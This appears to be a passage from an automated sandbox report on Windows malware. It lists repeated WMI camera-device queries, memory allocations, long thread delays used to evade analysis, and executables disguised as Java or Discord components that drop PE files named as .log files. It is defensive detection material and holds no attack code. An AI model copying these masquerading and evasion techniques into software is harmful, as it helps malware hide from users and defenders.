                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeMemory allocated: 9B0000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeMemory allocated: 1A5E0000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeMemory allocated: 10C0000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeMemory allocated: 1AB60000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeMemory allocated: 1360000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeMemory allocated: 1B000000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeMemory allocated: 2590000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeMemory allocated: 1A760000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeMemory allocated: D90000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeMemory allocated: 1A9E0000 memory reserve | memory write watch
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeMemory allocated: 970000 memory reserve | memory write watch
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeMemory allocated: 1A3E0000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 600000
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 599875
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 599500
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 599235
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 599000
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 598891
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 598778
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 598641
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 3600000
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 598499
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 598360
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 300000
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 597969
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 597857
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 597688
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 597563
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 597406
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 597235
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 597123
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 596953
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 596828
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 596715
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 596605
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 596500
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 596390
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 596281
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 596167
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 596047
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 595938
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 595828
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 595719
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 595609
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 595500
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 595391
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 595266
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 595156
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 595047
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 594937
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 594827
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 594717
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 594608
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 594500
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 594391
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 594229
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 593323
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 593169
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 593062
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 592953
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 592833
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 592703
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 592591
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 592483
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 592374
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 592266
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 592156
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 592047
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWindow / User API: threadDelayed 2808
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWindow / User API: threadDelayed 6919
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\GoOOBNnj.log
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeDropped PE file which has not been started: C:\Users\user\Desktop\XeElcNfe.log
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\IlqWXNCe.log
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeDropped PE file which has not been started: C:\Users\user\Desktop\HBUOKBdR.log
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeDropped PE file which has not been started: C:\Users\user\Desktop\ToOuVQfl.log
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeDropped PE file which has not been started: C:\Users\user\Desktop\ebskEcaT.log
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\QPyLHGSL.log
